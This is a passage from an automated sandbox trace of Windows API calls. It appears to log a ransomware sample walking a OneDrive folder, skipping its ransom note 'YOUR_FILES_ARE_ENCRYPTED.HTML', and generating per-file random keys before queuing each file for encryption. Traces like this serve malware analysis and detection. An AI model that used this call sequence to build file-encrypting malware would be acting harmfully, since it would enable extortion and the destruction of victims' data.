RandomBufferLength=0x20 | out: RandomBuffer=0x19e16c) returned 1 [0111.782] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\CollectOneDriveLogs.bat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_1\\collectonedrivelogs.bat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x334 [0111.783] GetFileSizeEx (in: hFile=0x334, lpFileSize=0x19e190 | out: lpFileSize=0x19e190*=5850) returned 1 [0111.783] GetProcessHeap () returned 0x600000 [0111.783] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x30a0048 [0111.786] wsprintfW (in: param_1=0x19e0aa, param_2="%02X" | out: param_1="27") returned 2 [0111.786] wsprintfW (in: param_1=0x19e0ae, param_2="%02X" | out: param_1="A1") returned 2 [0111.786] wsprintfW (in: param_1=0x19e0b2, param_2="%02X" | out: param_1="17") returned 2 [0111.786] wsprintfW (in: param_1=0x19e0b6, param_2="%02X" | out: param_1="4E") returned 2 [0111.786] wsprintfW (in: param_1=0x19e0ba, param_2="%02X" | out: param_1="79") returned 2 [0111.786] wsprintfW (in: param_1=0x19e0be, param_2="%02X" | out: param_1="F1") returned 2 [0111.787] wsprintfW (in: param_1=0x19e0c2, param_2="%02X" | out: param_1="9A") returned 2 [0111.787] wsprintfW (in: param_1=0x19e0c6, param_2="%02X" | out: param_1="C8") returned 2 [0111.787] wsprintfW (in: param_1=0x19e0ca, param_2="%02X" | out: param_1="EF") returned 2 [0111.787] wsprintfW (in: param_1=0x19e0ce, param_2="%02X" | out: param_1="A0") returned 2 [0111.787] wsprintfW (in: param_1=0x19e0d2, param_2="%02X" | out: param_1="2A") returned 2 [0111.787] wsprintfW (in: param_1=0x19e0d6, param_2="%02X" | out: param_1="EC") returned 2 [0111.787] wsprintfW (in: param_1=0x19e0da, param_2="%02X" | out: param_1="0A") returned 2 [0111.787] wsprintfW (in: param_1=0x19e0de, param_2="%02X" | out: param_1="38") returned 2 [0111.787] wsprintfW (in: param_1=0x19e0e2, param_2="%02X" | out: param_1="5E") returned 2 [0111.787] wsprintfW (in: param_1=0x19e0e6, param_2="%02X" | out: param_1="70") returned 2 [0111.787] wsprintfW (in: param_1=0x19e0ea, param_2="%02X" | out: param_1="BF") returned 2 [0111.787] wsprintfW (in: param_1=0x19e0ee, param_2="%02X" | out: param_1="F8") returned 2 [0111.787] wsprintfW (in: param_1=0x19e0f2, param_2="%02X" | out: param_1="7E") returned 2 [0111.787] wsprintfW (in: param_1=0x19e0f6, param_2="%02X" | out: param_1="05") returned 2 [0111.787] wsprintfW (in: param_1=0x19e0fa, param_2="%02X" | out: param_1="56") returned 2 [0111.787] wsprintfW (in: param_1=0x19e0fe, param_2="%02X" | out: param_1="D5") returned 2 [0111.787] wsprintfW (in: param_1=0x19e102, param_2="%02X" | out: param_1="B7") returned 2 [0111.787] wsprintfW (in: param_1=0x19e106, param_2="%02X" | out: param_1="98") returned 2 [0111.787] wsprintfW (in: param_1=0x19e10a, param_2="%02X" | out: param_1="9D") returned 2 [0111.787] wsprintfW (in: param_1=0x19e10e, param_2="%02X" | out: param_1="63") returned 2 [0111.787] wsprintfW (in: param_1=0x19e112, param_2="%02X" | out: param_1="EE") returned 2 [0111.787] wsprintfW (in: param_1=0x19e116, param_2="%02X" | out: param_1="67") returned 2 [0111.787] wsprintfW (in: param_1=0x19e11a, param_2="%02X" | out: param_1="A3") returned 2 [0111.787] wsprintfW (in: param_1=0x19e11e, param_2="%02X" | out: param_1="20") returned 2 [0111.787] wsprintfW (in: param_1=0x19e122, param_2="%02X" | out: param_1="5F") returned 2 [0111.787] wsprintfW (in: param_1=0x19e126, param_2="%02X" | out: param_1="42") returned 2 [0111.788] lstrcpyW (in: lpString1=0x30b00fc, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\CollectOneDriveLogs.bat" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\CollectOneDriveLogs.bat") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\CollectOneDriveLogs.bat" [0111.788] CreateIoCompletionPort (FileHandle=0x334, ExistingCompletionPort=0x274, CompletionKey=0x30a0048, NumberOfConcurrentThreads=0x0) returned 0x274 [0111.788] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x30a0048, lpOverlapped=0x30a0048) returned 1 [0111.788] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1583f985, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0x1583f985, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0x15a2f89d, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x72c0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="ETWlog.dll", cAlternateFileName="")) returned 1 [0111.788] StrStrIW (lpFirst="ETWlog.dll", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.788] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\ETWlog.dll") returned 86 [0111.788] PathFindExtensionW (pszPath="ETWlog.dll") returned=".dll" [0111.788] lstrlenW (lpString=".dll") returned 4 [0111.788] PathFindExtensionW (pszPath="ETWlog.dll") returned=".dll" [0111.788] SystemFunction036 (in: RandomBuffer=0x19e16c, RandomBufferLength=0x20 | out: RandomBuffer=0x19e16c) returned 1 [0111.788] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\ETWlog.dll" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_1\\etwlog.dll"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x318 [0111.790] GetFileSizeEx (in: hFile=0x318, lpFileSize=0x19e190 | out: lpFileSize=0x19e190*=29376) returned 1 [0111.790] GetProcessHeap () returned 0x600000 [0111.790] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x30c81a0 [0111.792] wsprintfW (in: param_1=0x19e0aa, param_2="%02X" | out: param_1="D4") returned 2 [0111.792] wsprintfW (in: param_1=0x19e0ae, param_2="%02X" | out: param_1="EF") returned 2 [0111.792] wsprintfW (in: param_1=0x19e0b2, param_2="%02X" | out: param_1="A9") returned 2 [0111.792] wsprintfW (in: param_1=0x19e0b6, param_2="%02X" | out: param_1="73") returned 2 [0111.792] wsprintfW (in: param_1=0x19e0ba, param_2="%02X" | out: param_1="84") returned 2 [0111.792] wsprintfW (in: param_1=0x19e0be, param_2="%02X" | out: param_1="4E") returned 2 [0111.792] wsprintfW (in: param_1=0x19e0c2, param_2="%02X" | out: param_1="66") returned 2 [0111.792] wsprintfW (in: param_1=0x19e0c6, param_2="%02X" | out: param_1="24") returned 2 [0111.792] wsprintfW (in: param_1=0x19e0ca, param_2="%02X" | out: param_1="F8") returned 2 [0111.792] wsprintfW (in: param_1=0x19e0ce, param_2="%02X" | out: param_1="BB") returned 2 [0111.792] wsprintfW (in: param_1=0x19e0d2, param_2="%02X" | out: param_1="89") returned 2 [0111.792] wsprintfW (in: param_1=0x19e0d6, param_2="%02X" | out: param_1="42") returned 2 [0111.792] wsprintfW (in: param_1=0x19e0da, param_2="%02X" | out: param_1="AF") returned 2 [0111.792] wsprintfW (in: param_1=0x19e0de, param_2="%02X" | out: param_1="8C") returned 2 [0111.792] wsprintfW (in: param_1=0x19e0e2, param_2="%02X" | out: param_1="BA") returned 2 [0111.792] wsprintfW (in: param_1=0x19e0e6, param_2="%02X" | out: param_1="16") returned 2 [0111.792] wsprintfW (in: param_1=0x19e0ea, param_2="%02X" | out: param_1="1B") returned 2 [0111.792] wsprintfW (in: param_1=0x19e0ee, param_2="%02X" | out: param_1="F4") returned 2 [0111.792] wsprintfW (in: param_1=0x19e0f2, param_2="%02X" | out: param_1="C2") returned 2 [0111.793] wsprintfW (in: param_1=0x19e0f6, param_2="%02X" | out: param_1="A7") returned 2 [0111.793] wsprintfW (in: param_1=0x19e0fa, param_2="%02X" | out: param_1="56") returned 2 [0111.793] wsprintfW (in: param_1=0x19e0fe, param_2="%02X" | out: param_1="50") returned 2 [0111.793] wsprintfW (in: param_1=0x19e102, param_2="%02X" | out: param_1="9A") returned 2 [0111.793] wsprintfW (in: param_1=0x19e106, param_2="%02X" | out: param_1="97") returned 2 [0111.793] wsprintfW (in: param_1=0x19e10a, param_2="%02X" | out: param_1="36") returned 2 [0111.793] wsprintfW (in: param_1=0x19e10e, param_2="%02X" | out: param_1="87") returned 2 [0111.793] wsprintfW (in: param_1=0x19e112, param_2="%02X" | out: param_1="39") returned 2 [0111.793] wsprintfW (in: param_1=0x19e116, param_2="%02X" | out: param_1="7B") returned 2 [0111.793] wsprintfW (in: param_1=0x19e11a, param_2="%02X" | out: param_1="F5") returned 2 [0111.793] wsprintfW (in: param_1=0x19e11e, param_2="%02X" | out: param_1="A9") returned 2 [0111.793] wsprintfW (in: param_1=0x19e122, param_2="%02X" | out: param_1="A6") returned 2 [0111.793] wsprintfW (in: param_1=0x19e126, param_2="%02X" | out: param_1="05") returned 2 [0111.793] lstrcpyW (in: lpString1=0x30d8254, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\ETWlog.dll" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\ETWlog.dll") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\ETWlog.dll" [0111.793] CreateIoCompletionPort (FileHandle=0x318, ExistingCompletionPort=0x274, CompletionKey=0x30c81a0, NumberOfConcurrentThreads=0x0) returned 0x274 [0111.793] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x30c81a0, lpOverlapped=0x30c81a0) returned 1 [0111.794] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x15de92d7, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0x15de92d7, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0x15f66b03, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x4e5f, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="ExclusionList.xml", cAlternateFileName="EXCLUS~1.XML")) returned 1 [0111.794] StrStrIW (lpFirst="ExclusionList.xml", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.794] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\ExclusionList.xml") returned 93 [0111.794] PathFindExtensionW (pszPath="ExclusionList.xml") returned=".xml" [0111.794] lstrlenW (lpString=".xml") returned 4 [0111.794] PathFindExtensionW (pszPath="ExclusionList.xml") returned=".xml" [0111.794] SystemFunction036 (in: RandomBuffer=0x19e16c, RandomBufferLength=0x20 | out: RandomBuffer=0x19e16c) returned 1 [0111.794] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\ExclusionList.xml" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_1\\exclusionlist.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x310 [0111.798] GetFileSizeEx (in: hFile=0x310, lpFileSize=0x19e190 | out: lpFileSize=0x19e190*=20063) returned 1 [0111.798] GetProcessHeap () returned 0x600000 [0111.798] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x660338 [0111.801] wsprintfW (in: param_1=0x19e0aa, param_2="%02X" | out: param_1="5C") returned 2 [0111.801] wsprintfW (in: param_1=0x19e0ae, param_2="%02X" | out: param_1="17") returned 2 [0111.801] wsprintfW (in: param_1=0x19e0b2, param_2="%02X" | out: param_1="BC") returned 2 [0111.801] wsprintfW (in: param_1=0x19e0b6, param_2="%02X" | out: param_1="5C") returned 2 [0111.801] wsprintfW (in: param_1=0x19e0ba, param_2="%02X" | out: param_1="69") returned 2 [0111.801] wsprintfW (in: param_1=0x19e0be, param_2="%02X" | out: param_1="CE") returned 2 [0111.801] wsprintfW (in: param_1=0x19e0c2, param_2="%02X" | out: param_1="29") returned 2 [0111.801] wsprintfW (in: param_1=0x19e0c6, param_2="%02X" | out: param_1="DB") returned 2 [0111.801] wsprintfW (in: param_1=0x19e0ca, param_2="%02X" | out: param_1="D1") returned 2 [0111.801] wsprintfW (in: param_1=0x19e0ce, param_2="%02X" | out: param_1="A6") returned 2 [0111.801] wsprintfW (in: param_1=0x19e0d2, param_2="%02X" | out: param_1="AA") returned 2 [0111.801] wsprintfW (in: param_1=0x19e0d6, param_2="%02X" | out: param_1="D2") returned 2 [0111.801] wsprintfW (in: param_1=0x19e0da, param_2="%02X" | out: param_1="E3") returned 2 [0111.801] wsprintfW (in: param_1=0x19e0de, param_2="%02X" | out: param_1="94") returned 2 [0111.801] wsprintfW (in: param_1=0x19e0e2, param_2="%02X" | out: param_1="39") returned 2 [0111.801] wsprintfW (in: param_1=0x19e0e6, param_2="%02X" | out: param_1="8F") returned 2 [0111.801] wsprintfW (in: param_1=0x19e0ea, param_2="%02X" | out: param_1="31") returned 2 [0111.801] wsprintfW (in: param_1=0x19e0ee, param_2="%02X" | out: param_1="0B") returned 2 [0111.801] wsprintfW (in: param_1=0x19e0f2, param_2="%02X" | out: param_1="EB") returned 2 [0111.801] wsprintfW (in: param_1=0x19e0f6, param_2="%02X" | out: param_1="15") returned 2 [0111.801] wsprintfW (in: param_1=0x19e0fa, param_2="%02X" | out: param_1="9A") returned 2 [0111.801] wsprintfW (in: param_1=0x19e0fe, param_2="%02X" | out: param_1="C3") returned 2 [0111.801] wsprintfW (in: param_1=0x19e102, param_2="%02X" | out: param_1="40") returned 2 [0111.801] wsprintfW (in: param_1=0x19e106, param_2="%02X" | out: param_1="F4") returned 2 [0111.801] wsprintfW (in: param_1=0x19e10a, param_2="%02X" | out: param_1="13") returned 2 [0111.801] wsprintfW (in: param_1=0x19e10e, param_2="%02X" | out: param_1="40") returned 2 [0111.801] wsprintfW (in: param_1=0x19e112, param_2="%02X" | out: param_1="9A") returned 2 [0111.801] wsprintfW (in: param_1=0x19e116, param_2="%02X" | out: param_1="03") returned 2 [0111.801] wsprintfW (in: param_1=0x19e11a, param_2="%02X" | out: param_1="51") returned 2 [0111.801] wsprintfW (in: param_1=0x19e11e, param_2="%02X" | out: param_1="72") returned 2 [0111.801] wsprintfW (in: param_1=0x19e122, param_2="%02X" | out: param_1="BB") returned 2 [0111.802] wsprintfW (in: param_1=0x19e126, param_2="%02X" | out: param_1="4D") returned 2 [0111.802] lstrcpyW (in: lpString1=0x6703ec, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\ExclusionList.xml" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\ExclusionList.xml") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\ExclusionList.xml" [0111.802] CreateIoCompletionPort (FileHandle=0x310, ExistingCompletionPort=0x274, CompletionKey=0x660338, NumberOfConcurrentThreads=0x0) returned 0x274 [0111.802] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x660338, lpOverlapped=0x660338) returned 1 [0111.802] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x16071ad7, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0x16071ad7, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0x161c908f, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x140c0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="FileSync.LocalizedResources.dll", cAlternateFileName="FILESY~1.DLL")) returned 1 [0111.802] StrStrIW (lpFirst="FileSync.LocalizedResources.dll", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.802] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\FileSync.LocalizedResources.dll") returned 107 [0111.802] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll") returned=".dll" [0111.802] lstrlenW (lpString=".dll") returned 4 [0111.802] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll") returned=".dll" [0111.802] SystemFunction036 (in: RandomBuffer=0x19e16c, RandomBufferLength=0x20 | out: RandomBuffer=0x19e16c) returned 1 [0111.802] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\FileSync.LocalizedResources.dll" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_1\\filesync.localizedresources.dll"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x328 [0111.805] GetFileSizeEx (in: hFile=0x328, lpFileSize=0x19e190 | out: lpFileSize=0x19e190*=82112) returned 1 [0111.805] GetProcessHeap () returned 0x600000 [0111.805] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x688490 [0111.815] wsprintfW (in: param_1=0x19e0aa, param_2="%02X" | out: param_1="EC") returned 2 [0111.815] wsprintfW (in: param_1=0x19e0ae, param_2="%02X" | out: param_1="CB") returned 2 [0111.815] wsprintfW (in: param_1=0x19e0b2, param_2="%02X" | out: param_1="70") returned 2 [0111.815] wsprintfW (in: param_1=0x19e0b6, param_2="%02X" | out: param_1="93") returned 2 [0111.815] wsprintfW (in: param_1=0x19e0ba, param_2="%02X" | out: param_1="E0") returned 2 [0111.815] wsprintfW (in: param_1=0x19e0be, param_2="%02X" | out: param_1="B0") returned 2 [0111.815] wsprintfW (in: param_1=0x19e0c2, param_2="%02X" | out: param_1="C3") returned 2 [0111.815] wsprintfW (in: param_1=0x19e0c6, param_2="%02X" | out: param_1="E6") returned 2 [0111.815] wsprintfW (in: param_1=0x19e0ca, param_2="%02X" | out: param_1="7B") returned 2 [0111.815] wsprintfW (in: param_1=0x19e0ce, param_2="%02X" | out: param_1="66") returned 2 [0111.815] wsprintfW (in: param_1=0x19e0d2, param_2="%02X" | out: param_1="7B") returned 2 [0111.815] wsprintfW (in: param_1=0x19e0d6, param_2="%02X" | out: param_1="EB") returned 2 [0111.815] wsprintfW (in: param_1=0x19e0da, param_2="%02X" | out: param_1="DD") returned 2 [0111.815] wsprintfW (in: param_1=0x19e0de, param_2="%02X" | out: param_1="D7") returned 2 [0111.815] wsprintfW (in: param_1=0x19e0e2, param_2="%02X" | out: param_1="EB") returned 2 [0111.815] wsprintfW (in: param_1=0x19e0e6, param_2="%02X" | out: param_1="89") returned 2 [0111.815] wsprintfW (in: param_1=0x19e0ea, param_2="%02X" | out: param_1="C9") returned 2 [0111.815] wsprintfW (in: param_1=0x19e0ee, param_2="%02X" | out: param_1="DE") returned 2 [0111.815] wsprintfW (in: param_1=0x19e0f2, param_2="%02X" | out: param_1="05") returned 2 [0111.815] wsprintfW (in: param_1=0x19e0f6, param_2="%02X" | out: param_1="87") returned 2 [0111.815] wsprintfW (in: param_1=0x19e0fa, param_2="%02X" | out: param_1="07") returned 2 [0111.815] wsprintfW (in: param_1=0x19e0fe, param_2="%02X" | out: param_1="B0") returned 2 [0111.815] wsprintfW (in: param_1=0x19e102, param_2="%02X" | out: param_1="74") returned 2 [0111.815] wsprintfW (in: param_1=0x19e106, param_2="%02X" | out: param_1="56") returned 2 [0111.815] wsprintfW (in: param_1=0x19e10a, param_2="%02X" | out: param_1="6B") returned 2 [0111.816] wsprintfW (in: param_1=0x19e10e, param_2="%02X" | out: param_1="BD") returned 2 [0111.816] wsprintfW (in: param_1=0x19e112, param_2="%02X" | out: param_1="29") returned 2 [0111.816] wsprintfW (in: param_1=0x19e116, param_2="%02X" | out: param_1="DF") returned 2 [0111.816] wsprintfW (in: param_1=0x19e11a, param_2="%02X" | out: param_1="4D") returned 2 [0111.816] wsprintfW (in: param_1=0x19e11e, param_2="%02X" | out: param_1="27") returned 2 [0111.816] wsprintfW (in: param_1=0x19e122, param_2="%02X" | out: param_1="87") returned 2 [0111.816] wsprintfW (in: param_1=0x19e126, param_2="%02X" | out: param_1="07") returned 2 [0111.816] lstrcpyW (in: lpString1=0x698544, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\FileSync.LocalizedResources.dll" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\FileSync.LocalizedResources.dll") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\FileSync.LocalizedResources.dll" [0111.832] CreateIoCompletionPort (FileHandle=0x328, ExistingCompletionPort=0x274, CompletionKey=0x688490, NumberOfConcurrentThreads=0x0) returned 0x274 [0111.832] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x688490, lpOverlapped=0x688490) returned 1 [0111.842] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x164ea204, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0x164ea204, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0x1ba724f0, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x28d8c0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="FileSync.Resources.dll", cAlternateFileName="FILESY~2.DLL")) returned 1 [0111.842] StrStrIW (lpFirst="FileSync.Resources.dll", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.842] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\FileSync.Resources.dll") returned 98 [0111.842] PathFindExtensionW (pszPath="FileSync.Resources.dll") returned=".dll" [0111.843] lstrlenW (lpString=".dll") returned 4 [0111.843] PathFindExtensionW (pszPath="FileSync.Resources.dll") returned=".dll" [0111.843] SystemFunction036 (in: RandomBuffer=0x19e16c, RandomBufferLength=0x20 | out: RandomBuffer=0x19e16c) returned 1 [0111.843] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\FileSync.Resources.dll" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_1\\filesync.resources.dll"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x328 [0111.911] GetFileSizeEx (in: hFile=0x328, lpFileSize=0x19e190 | out: lpFileSize=0x19e190*=2676928) returned 1 [0111.911] GetProcessHeap () returned 0x600000 [0111.911] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x30f2fc0 [0111.914] wsprintfW (in: param_1=0x19e0aa, param_2="%02X" | out: param_1="CE") returned 2 [0111.914] wsprintfW (in: param_1=0x19e0ae, param_2="%02X" | out: param_1="B7") returned 2 [0111.914] wsprintfW (in: param_1=0x19e0b2, param_2="%02X" | out: param_1="7C") returned 2 [0111.914] wsprintfW (in: param_1=0x19e0b6, param_2="%02X" | out: param_1="26") returned 2 [0111.914] wsprintfW (in: param_1=0x19e0ba, param_2="%02X" | out: param_1="C2") returned 2 [0111.914] wsprintfW (in: param_1=0x19e0be, param_2="%02X" | out: param_1="A9") returned 2 [0111.914] wsprintfW (in: param_1=0x19e0c2, param_2="%02X" | out: param_1="A4") returned 2 [0111.914] wsprintfW (in: param_1=0x19e0c6, param_2="%02X" | out: param_1="BD") returned 2 [0111.914] wsprintfW (in: param_1=0x19e0ca, param_2="%02X" | out: param_1="FF") returned 2 [0111.914] wsprintfW (in: param_1=0x19e0ce, param_2="%02X" | out: param_1="18") returned 2 [0111.914] wsprintfW (in: param_1=0x19e0d2, param_2="%02X" | out: param_1="31") returned 2 [0111.914] wsprintfW (in: param_1=0x19e0d6, param_2="%02X" | out: param_1="AF") returned 2 [0111.914] wsprintfW (in: param_1=0x19e0da, param_2="%02X" | out: param_1="AC") returned 2 [0111.914] wsprintfW (in: param_1=0x19e0de, param_2="%02X" | out: param_1="DD") returned 2 [0111.914] wsprintfW (in: param_1=0x19e0e2, param_2="%02X" | out: param_1="D3") returned 2 [0111.914] wsprintfW (in: param_1=0x19e0e6, param_2="%02X" | out: param_1="D7") returned 2 [0111.914] wsprintfW (in: param_1=0x19e0ea, param_2="%02X" | out: param_1="DD") returned 2 [0111.914] wsprintfW (in: param_1=0x19e0ee, param_2="%02X" | out: param_1="1B") returned 2 [0111.914] wsprintfW (in: param_1=0x19e0f2, param_2="%02X" | out: param_1="2D") returned 2 [0111.914] wsprintfW (in: param_1=0x19e0f6, param_2="%02X" | out: param_1="A9") returned 2 [0111.914] wsprintfW (in: param_1=0x19e0fa, param_2="%02X" | out: param_1="D6") returned 2 [0111.914] wsprintfW (in: param_1=0x19e0fe, param_2="%02X" | out: param_1="07") returned 2 [0111.914] wsprintfW (in: param_1=0x19e102, param_2="%02X" | out: param_1="98") returned 2 [0111.914] wsprintfW (in: param_1=0x19e106, param_2="%02X" | out: param_1="57") returned 2 [0111.914] wsprintfW (in: param_1=0x19e10a, param_2="%02X" | out: param_1="5E") returned 2 [0111.914] wsprintfW (in: param_1=0x19e10e, param_2="%02X" | out: param_1="D8") returned 2 [0111.914] wsprintfW (in: param_1=0x19e112, param_2="%02X" | out: param_1="D1") returned 2 [0111.914] wsprintfW (in: param_1=0x19e116, param_2="%02X" | out: param_1="E1") returned 2 [0111.914] wsprintfW (in: param_1=0x19e11a, param_2="%02X" | out: param_1="13") returned 2 [0111.914] wsprintfW (in: param_1=0x19e11e, param_2="%02X" | out: param_1="E0") returned 2 [0111.914] wsprintfW (in: param_1=0x19e122, param_2="%02X" | out: param_1="E3") returned 2 [0111.914] wsprintfW (in: param_1=0x19e126, param_2="%02X" | out: param_1="38") returned 2 [0111.915] lstrcpyW (in: lpString1=0x3103074, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\FileSync.Resources.dll" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\FileSync.Resources.dll") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\FileSync.Resources.dll" [0111.915] CreateIoCompletionPort (FileHandle=0x328, ExistingCompletionPort=0x274, CompletionKey=0x30f2fc0, NumberOfConcurrentThreads=0x0) returned 0x274 [0111.915] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x30f2fc0, lpOverlapped=0x30f2fc0) returned 1 [0111.915] FindNextFileW (in: 